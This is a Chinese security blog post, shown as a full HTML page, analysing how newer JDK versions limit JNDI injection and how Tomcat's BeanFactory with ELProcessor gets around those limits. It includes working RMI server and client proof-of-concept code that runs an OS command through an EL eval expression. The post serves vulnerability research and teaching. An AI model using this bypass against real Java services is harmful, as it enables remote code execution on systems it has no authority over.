<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-center-circle.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon1.ico?v=6.3.0">


  <link rel="mask-icon" href="/images/favicon1.ico?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="keywords" content="Java,漏洞分析">
<meta property="og:type" content="article">
<meta property="og:title" content="JNDI注入高版本jdk绕过学习">
<meta property="og:url" content="http://0day.design/2020/02/04/JNDI注入高版本jdk绕过学习/index.html">
<meta property="og:site_name" content="Passer6y&#39;s Blog">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://i.loli.net/2020/02/04/SA6bHygZ1i2XPvc.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/PIUEtu54kNjfQix.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/1gDbwn8KlpoNxai.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/iRMQuYLSU9xPOTc.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/yCHxrOaX1FkEAbD.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/jFlGYP6y7VUxoNp.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/W9Edkum7QgLRY38.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/BJckUNmv6MlsWK3.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/Zp98zRtWGmDUY4K.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/vpW2wES8aHOqzD7.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/q6x8Flwf3JKYRLb.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/v4gQZSNBaReHXCt.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/4g3GXuAzPqwS62r.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/CBjutm9X2J5641c.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/W5mGFZdpnULw8KV.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/yuJYBWomF597PTG.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/oHTvfMBNFmLqRgG.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/mQaDTtelRM3KIpF.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/ixHTKoJ96lOedpF.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/rdbLUxfGTgaR3o2.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/Q2Wq9I7pABjV4Kx.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/MREbsC7xUZhJeDQ.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/rQJMYBfpKNPOuXU.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/g5zKpEDTWPenwtv.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/OPduTZIns1hNeGl.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/24r7Mg8ObzZGjUi.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/gIh5DCmYP7VFMrL.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/QqEiUB2xFbvSPKN.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/CV9fJ6SbKwLyPXZ.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/Qb3VgFe1YKwqpRT.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/04/jHPDzuVL4n1mZyK.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/05/BIoitgfVF43vQJl.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/05/gcRSa4mTxC2uydb.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/05/ZSPQ5odTsyHzuKl.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/05/f965HStPoRhFDdM.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/05/eMHhzGxVlRsq4iS.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/05/jgzIwdaCo2qHt6O.jpg">
<meta property="og:image" content="https://i.loli.net/2020/02/05/uCjneMqth29IS3D.jpg">
<meta property="og:updated_time" content="2020-02-05T05:57:33.246Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="JNDI注入高版本jdk绕过学习">
<meta name="twitter:image" content="https://i.loli.net/2020/02/04/SA6bHygZ1i2XPvc.jpg">



  <link rel="alternate" href="/atom.xml" title="Passer6y's Blog" type="application/atom+xml" />




  <link rel="canonical" href="http://0day.design/2020/02/04/JNDI注入高版本jdk绕过学习/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>JNDI注入高版本jdk绕过学习 | Passer6y's Blog</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?14e9c0326e763de8b0a61711cc963a58";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Passer6y's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-ctf">
    <a href="/categories/CTF/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />CTF</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-web">
    <a href="/categories/Web/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-jsfiddle"></i> <br />Web</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-code">
    <a href="/categories/Code/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-code"></i> <br />Code</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-internet">
    <a href="/categories/Internet/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-wifi"></i> <br />内网渗透</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-others">
    <a href="/categories/Others/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-eye"></i> <br />Others</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-folder-open"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/About/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />Search</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  
    <div class="reading-progress-bar"></div>
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://0day.design/2020/02/04/JNDI注入高版本jdk绕过学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Passer6y">
      <meta itemprop="description" content="A salty fish">
      <meta itemprop="image" content="/images/21.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Passer6y's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">JNDI注入高版本jdk绕过学习
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2020-02-04 19:10:00" itemprop="dateCreated datePublished" datetime="2020-02-04T19:10:00+08:00">2020-02-04</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2020-02-05 13:57:33" itemprop="dateModified" datetime="2020-02-05T13:57:33+08:00">2020-02-05</time>
              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/Web/" itemprop="url" rel="index"><span itemprop="name">Web</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2020/02/04/JNDI注入高版本jdk绕过学习/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2020/02/04/JNDI注入高版本jdk绕过学习/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<a id="more"></a>
<p>在之前的复现分析过程中用到的jdk版本都是较低的版本，这篇文章主要研究不同jdk版本对JNDI注入不同姿势的影响，以及绕过姿势。关于JNDI注入和RMI的基础知识可以参考这两篇文章学习：</p>
<ul>
<li><a href="https://curz0n.github.io/2019/09/20/cve-2019-14540/" target="_blank" rel="noopener">curz0n: CVE-2019-14540远程代码执行漏洞分析&amp;复现</a></li>
<li><a href="https://kingx.me/Exploit-Java-Deserialization-with-RMI.html" target="_blank" rel="noopener">kingx: 深入理解JNDI注入与Java反序列化漏洞利用</a></li>
</ul>
<h2 id="RMI-Remote-Object-Payload-限制较多，不常使用"><a href="#RMI-Remote-Object-Payload-限制较多，不常使用" class="headerlink" title="RMI Remote Object Payload (限制较多，不常使用)"></a>RMI Remote Object Payload (限制较多，不常使用)</h2><h2 id="RMI-JNDI-Reference-Payload"><a href="#RMI-JNDI-Reference-Payload" class="headerlink" title="RMI + JNDI Reference Payload"></a>RMI + JNDI Reference Payload</h2><p>这个方法就是我们常用的加载远程class进行JNDI注入的操作，攻击者通过RMI服务返回一个JNDI Naming Reference，受害者解码Reference时会去我们指定的Codebase远程地址加载Factory类，但是原理上并非使用RMI Class Loading机制的，因此不受 <code>java.rmi.server.useCodebaseOnly</code>系统属性的限制，相对来说更加通用。</p>
<p>但是在JDK 6u132,JDK 7u122,JDK 8u113 中Java提升了JNDI 限制了Naming/Directory服务中JNDI Reference远程加载Object Factory类的特性。系统属性<code>com.sun.jndi.rmi.object.trustURLCodebase</code>、<code>com.sun.jndi.cosnaming.object.trustURLCodebase</code> 的默认值变为false，即默认不允许从远程的Codebase加载Reference工厂类。如果需要开启RMI Registry或者COS Naming Service Provider的远程类加载功能，需要将前面说的两个属性值设置为true。</p>
<p>Changelog:</p>
<ul>
<li>JDK 6u141 <a href="http://www.oracle.com/technetwork/java/javase/overview-156328.html#R160_141" target="_blank" rel="noopener">http://www.oracle.com/technetwork/java/javase/overview-156328.html#R160_141</a></li>
<li>JDK 7u131 <a href="http://www.oracle.com/technetwork/java/javase/7u131-relnotes-3338543.html" target="_blank" rel="noopener">http://www.oracle.com/technetwork/java/javase/7u131-relnotes-3338543.html</a></li>
<li>JDK 8u121 <a href="http://www.oracle.com/technetwork/java/javase/8u121-relnotes-3315208.html" target="_blank" rel="noopener">http://www.oracle.com/technetwork/java/javase/8u121-relnotes-3315208.html</a></li>
</ul>
<p>案例参考笔记：<a href="mweblib://15800918927450" target="_blank" rel="noopener">深入理解RMI&amp;JRMP&amp;JNDI</a></p>
<h3 id="触发过程分析"><a href="#触发过程分析" class="headerlink" title="触发过程分析"></a>触发过程分析</h3><h4 id="低版本8u73测试"><a href="#低版本8u73测试" class="headerlink" title="低版本8u73测试"></a>低版本8u73测试</h4><p>产生JNDI注入的原因是客户端<code>lookup</code>方法可控，我们先在Registry中注册恶意的Reference对象，加载远程类对象。<br><img src="https://i.loli.net/2020/02/04/SA6bHygZ1i2XPvc.jpg" alt="-w1162"></p>
<p>将Registry的url地址传入<code>InitialContext.lookup(URL)</code>方法中，这里用低版本8u73下断点调试:<br>/com/sun/jndi/toolkit/url/GenericURLContext.class<br><img src="https://i.loli.net/2020/02/04/PIUEtu54kNjfQix.jpg" alt="-w1278"><br>解析URL，将Exploit类传入，<code>lookup</code>方法调用<code>decodeObject</code>方法：/com/sun/jndi/rmi/registry/RegistryContext.class<br><img src="https://i.loli.net/2020/02/04/1gDbwn8KlpoNxai.jpg" alt="-w1330"><br>又进入到<code>NamingManager.getObjectInstance</code>方法：<br><img src="https://i.loli.net/2020/02/04/iRMQuYLSU9xPOTc.jpg" alt="-w1325"><br>在进入<code>getObjectInstance</code>方法后又在319行调用<code>getObjectFactoryFromReference</code>方法，先从本地的类加载器去<code>classpath</code>加载目标类，如果没有，则调用<code>loadClass(factoryName, codebase)</code>去远程加载我们构造的特定类，并将其实例化：<br><img src="https://i.loli.net/2020/02/04/yCHxrOaX1FkEAbD.jpg" alt="-w1391"></p>
<p> <img src="https://i.loli.net/2020/02/04/jFlGYP6y7VUxoNp.jpg" alt="-w1335"></p>
<p>整个利用流程：</p>
<ul>
<li>目标代码中调用了InitialContext.lookup(URI)，且URI为用户可控；</li>
<li>攻击者控制URI参数为恶意的RMI服务地址，如：rmi://hacker_rmi_server/classname；</li>
<li>击者RMI服务器向目标返回一个Reference对象，Reference对象中指定某个精心构造的Factory类；</li>
<li>目标在进行lookup()操作时，会动态加载并实例化Factory类，接着调用factory.getObjectInstance()获取外部远程对象实例；</li>
<li>攻击者可以在Factory类文件的构造方法、静态代码块、getObjectInstance()方法等处写入恶意代码，达到RCE的效果；</li>
</ul>
<h4 id="高版本8u201测试"><a href="#高版本8u201测试" class="headerlink" title="高版本8u201测试"></a>高版本8u201测试</h4><p>再来看看高版本8u201，在RegistryContext.class#decodeObject函数中，增加了<code>trustURLCodebase</code>的判断，且默认为<code>false</code>。<br><img src="https://i.loli.net/2020/02/04/W9Edkum7QgLRY38.jpg" alt="-w1243"></p>
<p>多个判断是逻辑与的关系，有一个不成立则可通过，这里可以利用<code>var8.getFactoryClassLocation()</code>为<code>null</code>进入<code>NamingManager.getObjectInstance</code>函数：<br><img src="https://i.loli.net/2020/02/04/BJckUNmv6MlsWK3.jpg" alt="-w1448"><br>接着进入<code>getObjectFactoryFromReference</code>函数，但是在加载远程类之前又进行了一次<code>null</code>判断，加载远程类：<br><img src="https://i.loli.net/2020/02/04/Zp98zRtWGmDUY4K.jpg" alt="-w1200"></p>
<p>所以这里的利用条件就变成了只能用<code>helper.loadClass(factoryName)</code>加载目标机器中<code>classpath</code>中的类。从下图NamingManager.java的代码中可以知道，该类要实现 <code>javax.naming.spi.ObjectFactory</code>接口，且存在<code>getObjectInstance</code>方法：<br><img src="https://i.loli.net/2020/02/04/vpW2wES8aHOqzD7.jpg" alt="-w1364"></p>
<p>总结一下高版本利用条件即：</p>
<ul>
<li>利用目标机器<code>classpath</code>类</li>
<li>实现了<code>javax.naming.spi.ObjectFactory</code>接口</li>
<li>存在<code>getObjectInstance</code>方法</li>
</ul>
<p>在下文中会介绍详细案例利用细节。</p>
<h2 id="LDAP-JNDI-Reference-Payload"><a href="#LDAP-JNDI-Reference-Payload" class="headerlink" title="LDAP + JNDI Reference Payload"></a>LDAP + JNDI Reference Payload</h2><p>除了RMI服务之外，JNDI还可以对接LDAP服务，LDAP也能返回JNDI Reference对象，利用过程与上面RMI Reference基本一致，只是lookup()中的URL为一个LDAP地址：ldap://xxx/xxx，由攻击者控制的LDAP服务端返回一个恶意的JNDI Reference对象。并且LDAP服务的Reference远程加载Factory类不受上一点中 <code>com.sun.jndi.rmi.object.trustURLCodebase</code>、<code>com.sun.jndi.cosnaming.object.trustURLCodebase</code>等属性的限制，所以适用范围更广。<br>不过在2018年10月，Java最终也修复了这个利用点，对LDAP Reference远程工厂类的加载增加了限制，在Oracle JDK 11.0.1、8u191、7u201、6u211之后 <code>com.sun.jndi.ldap.object.trustURLCodebase</code> 属性的默认值被调整为false，还对应的分配了一个漏洞编号CVE-2018-3149。</p>
<p>案例参考笔记：<a href="mweblib://15800918927450" target="_blank" rel="noopener">深入理解RMI&amp;JRMP&amp;JNDI</a></p>
<p>这里为了探究具体的修改点，跟进了8u181和8u201两个版本的ldap加载流程，解析codebase的流程不受<code>com.sun.jndi.rmi.object.trustURLCodebase`</code>com.sun.jndi.cosnaming.object.trustURLCodebase<code>属性影响，但在最后加载远程class的函数</code>helper.loadClass(factoryName, codebase)<code>高版本8u201条件添加了</code>trustURLCodebase`(默认为false)的校验，如下图所示：<br><img src="https://i.loli.net/2020/02/04/q6x8Flwf3JKYRLb.jpg" alt="-w803"></p>
<p><img src="https://i.loli.net/2020/02/04/v4gQZSNBaReHXCt.jpg" alt="-w1449"></p>
<h2 id="绕过JDK-8u191-等高版本限制"><a href="#绕过JDK-8u191-等高版本限制" class="headerlink" title="绕过JDK 8u191+等高版本限制"></a>绕过JDK 8u191+等高版本限制</h2><p>所以对于Oracle JDK 11.0.1、8u191、7u201、6u211或者更高版本的JDK来说，默认环境下之前这些利用方式都已经失效。然而，我们依然可以进行绕过并完成利用。两种绕过方法如下：</p>
<ol>
<li>找到一个受害者本地CLASSPATH中的类作为恶意的Reference Factory工厂类，并利用这个本地的Factory类执行命令。</li>
<li>利用LDAP直接返回一个恶意的序列化对象，JNDI注入依然会对该对象进行反序列化操作，利用反序列化Gadget完成命令执行。</li>
<li>JRMP：<a href="https://mp.weixin.qq.com/s?__biz=MzU4MTg1NzAzMA==&amp;mid=2247483796&amp;idx=1&amp;sn=ce4249ba61d7f402a1211e508f83d2b4&amp;chksm=fd407bfdca37f2ebd51202f8221d320ccd639fd48d6a2adcb53c17ccb143fc3f037e6198662a&amp;mpshare=1&amp;scene=23&amp;srcid=&amp;sharer_sharetime=1577970121763&amp;sharer_shareid=b6a93c2ad862a6198898de9305c515e1#rd" target="_blank" rel="noopener">空指针-treasure-Writeup</a><br>这三种方式都依赖受害者本地CLASSPATH中环境，需要利用受害者本地的Gadget进行攻击。</li>
</ol>
<h3 id="利用本地Class作为Reference-Factory绕过高版本限制"><a href="#利用本地Class作为Reference-Factory绕过高版本限制" class="headerlink" title="利用本地Class作为Reference Factory绕过高版本限制"></a>利用本地Class作为Reference Factory绕过高版本限制</h3><p>在上文中<em>RMI + JNDI Reference Payload</em>部分我们已经介绍了在高版本修复策略，以及绕过的利用条件。在<code>org.apache.naming.factory.BeanFactory</code>中刚好满足条件并且存在被利用的可能，该接口存在于Tomcat依赖包中，使用也是非常广泛。</p>
<p><strong>环境搭建</strong><br>之前用pom.xml拉tomcat的包复现蜜汁原因失败，后来用的MxSrvs里自带的tomcat依赖复现成功了。<br><img src="https://i.loli.net/2020/02/04/4g3GXuAzPqwS62r.jpg" alt="-w1393"><br>为了便于分析去导个源码，找到对应的版本，点下图所示的View All<br><img src="https://i.loli.net/2020/02/04/CBjutm9X2J5641c.jpg" alt="-w811"><br><img src="https://i.loli.net/2020/02/04/W5mGFZdpnULw8KV.jpg" alt="-w783"><br>然后去idea里导入就行了</p>
<p><strong>漏洞复现</strong><br>poc:<br>Server.java<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.sun.jndi.rmi.registry.ReferenceWrapper;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"><span class="keyword">import</span> javax.naming.StringRefAddr;</span><br><span class="line"><span class="keyword">import</span> org.apache.naming.ResourceRef;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Server</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        Registry registry = LocateRegistry.createRegistry(<span class="number">1099</span>);</span><br><span class="line">        ResourceRef resourceRef = <span class="keyword">new</span> ResourceRef(<span class="string">"javax.el.ELProcessor"</span>, (String)<span class="keyword">null</span>, <span class="string">""</span>, <span class="string">""</span>, <span class="keyword">true</span>, <span class="string">"org.apache.naming.factory.BeanFactory"</span>, (String)<span class="keyword">null</span>);</span><br><span class="line">        resourceRef.add(<span class="keyword">new</span> StringRefAddr(<span class="string">"forceString"</span>, <span class="string">"a=eval"</span>));</span><br><span class="line">        resourceRef.add(<span class="keyword">new</span> StringRefAddr(<span class="string">"a"</span>, <span class="string">"Runtime.getRuntime().exec(\"open /Applications/Calculator.app/\")"</span>));</span><br><span class="line">        ReferenceWrapper referenceWrapper = <span class="keyword">new</span> ReferenceWrapper(resourceRef);</span><br><span class="line">        registry.bind(<span class="string">"EvalObj"</span>, referenceWrapper);</span><br><span class="line">        System.out.println(<span class="string">"the Server is bind rmi://127.0.0.1:1098/EvalObj"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>Client.java<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.naming.*;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Client</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        String uri = <span class="string">"rmi://127.0.0.1:1099/EvalObj"</span>;</span><br><span class="line">        Context ctx = <span class="keyword">new</span> InitialContext();</span><br><span class="line">        ctx.lookup(uri); <span class="comment">// 返回加载的远程对象</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://i.loli.net/2020/02/04/yuJYBWomF597PTG.jpg" alt="-w1541"></p>
<p><strong>漏洞分析</strong><br>/org/apache/naming/factory/BeanFactory.java 这个类满足上述提到的高版本利用的两个条件：<br><img src="https://i.loli.net/2020/02/04/oHTvfMBNFmLqRgG.jpg" alt="-w1105"><br>BeanFactory.java#getObjectInstance，从上文<em>RMI + JNDI注入的触发流程</em>分析中可以知道，可控参数为<code>obj</code>和<code>name</code>。<br>这里限制了传入的对象必须为<code>ResourceRef</code>类，通过反射调用在148行实例化了一个无参对象，意味着<code>beanClass</code>得有一个无参构造函数：<br><img src="https://i.loli.net/2020/02/04/mQaDTtelRM3KIpF.jpg" alt="-w1149"></p>
<p>接着取出key为<code>forceString</code>的值进行以<code>,</code>分割，拆分<code>=</code>键值对，存入<code>hashMap</code>对象中：<br><img src="https://i.loli.net/2020/02/04/ixHTKoJ96lOedpF.jpg" alt="-w1240"></p>
<p>其后通过反射执行我们指定的之前构造的方法，并可以传入一个字符串类型的参数：<br><img src="https://i.loli.net/2020/02/04/rdbLUxfGTgaR3o2.jpg" alt="-w1219"></p>
<p>到这里利用过程就结束了，再来跟一下利用限制如何满足，第一个条件是传入的对象必须是属于<code>ResourceRef</code>类，接着调用了<code>ref.getClassName()</code>获取<code>beanClassName</code>，也就是目标类：<br><img src="https://i.loli.net/2020/02/04/Q2Wq9I7pABjV4Kx.jpg" alt="-w933"><br><img src="https://i.loli.net/2020/02/04/MREbsC7xUZhJeDQ.jpg" alt="-w582"></p>
<p>跟进<code>ResourceRef</code>类，该类也是<code>Reference</code>的子类，在实例化的时候，可以通过构造方法传入目标class：<br><img src="https://i.loli.net/2020/02/04/rQJMYBfpKNPOuXU.jpg" alt="-w855"><br>通过调用父类的构造方法实现成员变量<code>className</code>的赋值<br><img src="https://i.loli.net/2020/02/04/g5zKpEDTWPenwtv.jpg" alt="-w924"><br><img src="https://i.loli.net/2020/02/04/OPduTZIns1hNeGl.jpg" alt="-w494"></p>
<p>再来BeanFactory.java看一下<code>ref.get(&quot;forceString&quot;)</code>是如何实现的，我们要如果构造poc控制<code>forceString</code>参数，同样的也是在Reference.java中通过遍历成员变量<code>addrs</code>数组来进行寻找：<br><img src="https://i.loli.net/2020/02/04/24r7Mg8ObzZGjUi.jpg" alt="-w702"></p>
<p>在Reference.java中找到控制addrs元素的办法：<br><img src="https://i.loli.net/2020/02/04/gIh5DCmYP7VFMrL.jpg" alt="-w689"><br>要求我们传入一个<code>RefAddr</code>类型的<code>addr</code>，在其子类有一个<code>StringRefAddr</code>函数：<br><img src="https://i.loli.net/2020/02/04/QqEiUB2xFbvSPKN.jpg" alt="-w935"><br>所以可以通过这样的方式来设置属性：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">new</span> ResourceRef().add(<span class="keyword">new</span> StringRefAddr(<span class="string">"forceString"</span>, <span class="string">"xxx"</span>))</span><br></pre></td></tr></table></figure></p>
<p>在veracode博客中构造的beanClass是<code>javax.el.ELProcessor</code>，<code>ELProcessor</code>中有个<code>eval(String)</code>方法可以执行EL表达式，<code>javax.el.ELProcessor</code>是Tomcat8中的库，所以仅限Tomcat8及更高版本环境下可以通过该库进行攻击。</p>
<p><img src="https://i.loli.net/2020/02/04/CV9fJ6SbKwLyPXZ.jpg" alt="-w1598"></p>
<blockquote>
